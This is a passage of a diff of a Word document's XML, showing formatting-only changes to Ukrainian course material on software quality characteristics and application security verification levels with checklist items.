+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> що саме робить ПЗ, які завдання воно вирішує</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4057,7 +4950,25 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t>Функціональна придатність (suitability). Здатність вирішувати потрібний набір завдань.</w:t>
+        <w:t>Функціональна придатність (suitability). Здатність вирішувати потрібний набі</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>р</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> завдань.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4197,7 +5108,25 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t>Надійність (reliability). Здатність ПЗ підтримувати певну працездатність в заданих умовах.</w:t>
+        <w:t xml:space="preserve">Надійність (reliability). Здатність ПЗ </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>п</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>ідтримувати певну працездатність в заданих умовах.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4254,13 +5183,23 @@
           <w:szCs w:val="28"/>
         </w:rPr>
       </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>Стійкість до відмов (fault tolerance) Здатність підтримувати заданий рівень працездатності при відмовах і порушеннях правил взаємодії з оточенням.</w:t>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>Ст</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>ійкість до відмов (fault tolerance) Здатність підтримувати заданий рівень працездатності при відмовах і порушеннях правил взаємодії з оточенням.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4283,7 +5222,25 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t>Здатність до відновлення (recoverability). Здатність відновлювати певний рівень працездатності і цілісність даних після відмови, необхідні для цього час і ресурси.</w:t>
+        <w:t xml:space="preserve">Здатність до відновлення (recoverability). Здатність відновлювати певний </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>р</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>івень працездатності і цілісність даних після відмови, необхідні для цього час і ресурси.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4353,7 +5310,25 @@
           <w:szCs w:val="28"/>
         </w:rPr>
         <w:lastRenderedPageBreak/>
-        <w:t>Зрозумілість (understandability). Показник, зворотний до зусиль, витрачених користувачами, щоб сприйняти набір понять, на яких засновано ПО, і їх застосовність для вирішення своїх завдань.</w:t>
+        <w:t>Зрозумілість (understandability). Показник, зворотний до зусиль, витрачених користувачами, щоб сприйняти набі</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>р</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> понять, на яких засновано ПО, і їх застосовність для вирішення своїх завдань.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4445,7 +5420,25 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t>Продуктивність (efficiency) або ефективність. Здатність ПЗ при заданих умовах забезпечувати необхідну працездатність стосовно виділеним для цього ресурсів. Можна визначити її і як відношення одержуваних за допомогою ПЗ результатів до витрачених на це ресурсів.</w:t>
+        <w:t xml:space="preserve">Продуктивність (efficiency) або ефективність. Здатність ПЗ при заданих умовах забезпечувати необхідну працездатність стосовно виділеним для цього ресурсів. Можна визначити її і як відношення одержуваних за допомогою ПЗ результатів </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>до</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> витрачених на це ресурсів.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4491,7 +5484,25 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t>Ефективність використання ресурсів (resource utilisation). Здатність вирішувати потрібні завдання з використанням певних обсягів ресурсів певних видів. Маються на увазі такі ресурси, як оперативна і довгострокова пам'ять, мережеві з'єднання, пристрої введення і виведення, тощо.</w:t>
+        <w:t xml:space="preserve">Ефективність використання ресурсів (resource utilisation). Здатність вирішувати потрібні завдання з використанням певних обсягів ресурсів певних видів. Маються на увазі такі ресурси, як оперативна і довгострокова </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>пам'ять</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>, мережеві з'єднання, пристрої введення і виведення, тощо.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4560,7 +5571,25 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t>аналізований (analyzability) або зручність проведення аналізу. Зручність проведення аналізу помилок, дефектів і недоліків, а також зручність аналізу на предмет необхідних змін і їх можливих ефектів.</w:t>
+        <w:t>аналізований (analyzability) або зручність проведення аналізу. Зручність проведення аналізу помилок, дефектів і недолі</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>к</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>ів, а також зручність аналізу на предмет необхідних змін і їх можливих ефектів.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4607,7 +5636,43 @@
           <w:szCs w:val="28"/>
         </w:rPr>
         <w:lastRenderedPageBreak/>
-        <w:t>Зручність перевірки (testability). Показник, зворотний до трудовитрат на проведення тестування та інших видів перевірки того, що внесені зміни привели до потрібних ефектів.</w:t>
+        <w:t xml:space="preserve">Зручність </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>перев</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>ірки (testability). Показник, зворотний до трудовитрат на проведення тестування та інших видів перевірки того, що внесені зміни привели до потрібних ефекті</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>в</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4676,7 +5741,25 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t>Адаптируемость (adaptability). Здатність ПЗ пристосовуватися до різних оточенням без проведення для цього дій, крім заздалегідь передбачених.</w:t>
+        <w:t xml:space="preserve">Адаптируемость (adaptability). Здатність ПЗ пристосовуватися до </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>р</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>ізних оточенням без проведення для цього дій, крім заздалегідь передбачених.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4745,8 +5828,18 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t>Зручність заміни (replaceability) іншого ПО даними. Здатність ПЗ використовуватися замість іншого ПО для вирішення тих же самих завдань в заданому оточенні.</w:t>
-      </w:r>
+        <w:t xml:space="preserve">Зручність заміни (replaceability) іншого ПО даними. </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>Здатність ПЗ використовуватися замість іншого ПО для вирішення тих же самих завдань в заданому оточенні.</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -4930,7 +6023,27 @@
           <w:szCs w:val="28"/>
           <w:lang w:val="uk-UA"/>
         </w:rPr>
-        <w:t>можна виділити три рівні перевірки безпеки програмних додатків</w:t>
+        <w:t xml:space="preserve">можна виділити три </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="uk-UA"/>
+        </w:rPr>
+        <w:t>р</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="uk-UA"/>
+        </w:rPr>
+        <w:t>івні перевірки безпеки програмних додатків</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4955,6 +6068,7 @@
         </w:rPr>
         <w:br/>
       </w:r>
+      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -4963,7 +6077,18 @@
           <w:szCs w:val="28"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
-        <w:t>Рівень1 призначений для всіх програм.</w:t>
+        <w:t>Р</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="212121"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>івень1 призначений для всіх програм.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4980,6 +6105,7 @@
           <w:lang w:val="uk-UA"/>
         </w:rPr>
       </w:pPr>
+      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -4988,7 +6114,18 @@
           <w:szCs w:val="28"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
-        <w:t>Рівень 2 призначений для додатків, які містять конфіденційні дані, які вимагають захисту.  </w:t>
+        <w:t>Р</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="212121"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>івень 2 призначений для додатків, які містять конфіденційні дані, які вимагають захисту.  </w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -5352,8 +6489,9 @@
           <w:szCs w:val="28"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
-        <w:t xml:space="preserve">Елементи управління рівня 1 можуть бути забезпечені або автоматично за </w:t>
-      </w:r>
+        <w:t xml:space="preserve">Елементи управління </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -5362,8 +6500,51 @@
           <w:szCs w:val="28"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
+        <w:t>р</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="212121"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve">івня 1 можуть бути забезпечені або автоматично за </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="212121"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
         <w:lastRenderedPageBreak/>
-        <w:t>допомогою інструментів, або просто вручну без доступу до вихідного коду. Ми розглядаємо рівень 1 як мінімум необхідний для всіх додатків. Загрози для додатка, швидше за все, будуть від зловмисників, які використовують прості і маловитратні методи для виявлення легкодоступних і простих у використанні вразливостей.</w:t>
+        <w:t xml:space="preserve">допомогою інструментів, або просто вручну без доступу до вихідного коду. Ми розглядаємо </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="212121"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>р</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="212121"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>івень 1 як мінімум необхідний для всіх додатків. Загрози для додатка, швидше за все, будуть від зловмисників, які використовують прості і маловитратні методи для виявлення легкодоступних і простих у використанні вразливостей.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -5466,6 +6647,7 @@
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
+      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -5474,8 +6656,9 @@
           <w:szCs w:val="28"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
-        <w:t>рівня</w:t>
-      </w:r>
+        <w:t>р</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -5484,6 +6667,16 @@
           <w:szCs w:val="28"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
+        <w:t>івня</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="212121"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
         <w:t xml:space="preserve"> (</w:t>
       </w:r>
       <w:r>
@@ -5794,7 +6987,51 @@
           <w:szCs w:val="28"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
-        <w:t>Рівень 2 забезпечує контроль безпеки на місці, ефективний і використовується в додатку. Рівень 2, як правило, підходить для додатків, обробних значні бізнес-бізнес операцій, в тому числі ті, які обробляють інформацію в галузі охорони здоров'я, реалізації бізнес-критичних або чутливих функцій або процесів інших чутливих активів. Загрози застосування 2-го рівня, як правило, будуть кваліфіковані та мотивовані атакуючі зосередивши увагу на конкретних задач з використанням інструментів і методів, які високо практикували і ефективних на виявлення і використання слабких місць в додатках</w:t>
+        <w:t xml:space="preserve">Рівень 2 забезпечує контроль безпеки на місці, ефективний і використовується в додатку. </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="212121"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>Р</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="212121"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>івень 2, як правило, підходить для додатків, обробних значні бізнес-бізнес операцій, в тому числі ті, які обробляють інформацію в галузі охорони здоров'я, реалізації бізнес-критичних або чутливих функцій або процесів інших чутливих активів. Загрози застосування 2-го рівня, як правило, будуть кваліфіковані та мотивовані атакуючі зосередивши увагу на конкретних задач з використанням інструментів і методі</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="212121"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>в</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="212121"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>, які високо практикували і ефективних на виявлення і використання слабких місць в додатках</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -6049,7 +7286,29 @@
           <w:szCs w:val="28"/>
           <w:lang w:eastAsia="ru-RU"/>
         </w:rPr>
-        <w:t>1. Архітектура, проектування та моделювання загроз</w:t>
+        <w:t xml:space="preserve">1. </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="212121"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t>Арх</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="212121"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t>ітектура, проектування та моделювання загроз</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -7093,7 +8352,29 @@
                 <w:szCs w:val="28"/>
                 <w:lang w:eastAsia="ru-RU"/>
               </w:rPr>
-              <w:t xml:space="preserve">Переконайтеся в тому, що архітектура високого рівня для </w:t>
+              <w:t xml:space="preserve">Переконайтеся в тому, що </w:t>
+            </w:r>
+            <w:proofErr w:type="gramStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t>арх</w:t>
+            </w:r>
+            <w:proofErr w:type="gramEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t xml:space="preserve">ітектура високого рівня для </w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -7325,7 +8606,51 @@
                 <w:szCs w:val="28"/>
                 <w:lang w:eastAsia="ru-RU"/>
               </w:rPr>
-              <w:t>Переконайтеся в тому, що всі компоненти програми визначаються</w:t>
+              <w:t xml:space="preserve">Переконайтеся </w:t>
+            </w:r>
+            <w:proofErr w:type="gramStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t>в</w:t>
+            </w:r>
+            <w:proofErr w:type="gramEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> </w:t>
+            </w:r>
+            <w:proofErr w:type="gramStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t>тому</w:t>
+            </w:r>
+            <w:proofErr w:type="gramEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t>, що всі компоненти програми визначаються</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -8336,7 +9661,29 @@
                 <w:szCs w:val="28"/>
                 <w:lang w:eastAsia="ru-RU"/>
               </w:rPr>
-              <w:t>, правила брандмауера або групи безпеки на основі хмарних обчислень.</w:t>
+              <w:t xml:space="preserve">, правила брандмауера або групи безпеки </w:t>
+            </w:r>
+            <w:proofErr w:type="gramStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t>на</w:t>
+            </w:r>
+            <w:proofErr w:type="gramEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> основі хмарних обчислень.</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -8565,7 +9912,29 @@
                 <w:szCs w:val="28"/>
                 <w:lang w:eastAsia="ru-RU"/>
               </w:rPr>
-              <w:t>є чіткий поділ між шаром даних,</w:t>
+              <w:t xml:space="preserve">є чіткий поділ </w:t>
+            </w:r>
+            <w:proofErr w:type="gramStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t>між</w:t>
+            </w:r>
+            <w:proofErr w:type="gramEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
